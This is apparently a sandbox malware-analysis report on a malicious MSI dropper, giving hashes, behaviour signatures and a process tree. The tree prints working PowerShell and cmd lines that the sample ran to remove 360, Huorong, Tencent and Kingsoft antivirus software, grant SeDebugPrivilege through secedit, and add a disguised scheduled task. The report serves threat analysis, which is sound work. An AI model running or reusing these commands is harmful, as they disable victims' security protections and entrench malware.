Overview

overview

10

Static

static

1

2496afe349...44.msi

windows7-x64

10

2496afe349...44.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/09/2024, 08:22

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi

  • Size

    72.6MB

  • MD5

    b93c7a9d3b8ab6939f673c8a316d7fac

  • SHA1

    2b900cc34fbc6d28cdcbc91368317b7019735027

  • SHA256

    2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544

  • SHA512

    eae37ade54e876f3c28e476a5bd88c0d3678cd73d208eec4b68ba8e1e0738e1620327c82a6d9cc6f773eed85d3dfe9ad317071b29b16821382ee8ccb32650b9c

  • SSDEEP

    1572864:WJCqQUW9zp3E8N9yBrJyyEL5OE6q4UxU12xNtkI:2WU8vynyyErxFNr

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

    execution
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 12 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Loads dropped DLL 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 43 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2104
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 31A75E469FC1DD815E2E24F57D03AA96
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2524
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\SysWOW64\fltMC.exe
          fltmc.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1692
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Hide Artifacts: Ignore Process Interrupts
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2876
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Hide Artifacts: Ignore Process Interrupts
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:284
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚѶµçÄԹܼÒ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Hide Artifacts: Ignore Process Interrupts
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Hide Artifacts: Ignore Process Interrupts
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2248
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Hide Artifacts: Ignore Process Interrupts
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2296
      • C:\ProgramData\Data\un.exe
        "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\
        3⤵
        • Executes dropped EXE
        PID:1980
      • C:\ProgramData\Program\iusb3mon.exe
        "C:\ProgramData\Program\iusb3mon.exe" false
        3⤵
        • UAC bypass
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:960
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2752
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1532
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2648
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1824
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1656
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1108
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:804
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:652
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo.>c:\inst.ini
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2040
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          PID:2340
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          PID:2160
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          PID:2404
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2440
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2484
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          PID:2060
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          PID:2960
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          PID:928
    • C:\Program Files (x86)\My Product\LineInst.exe
      "C:\Program Files (x86)\My Product\LineInst.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      PID:1464
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2836
  • C:\Windows\system32\DrvInst.exe
    DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005F4" "00000000000003C4"
    1⤵
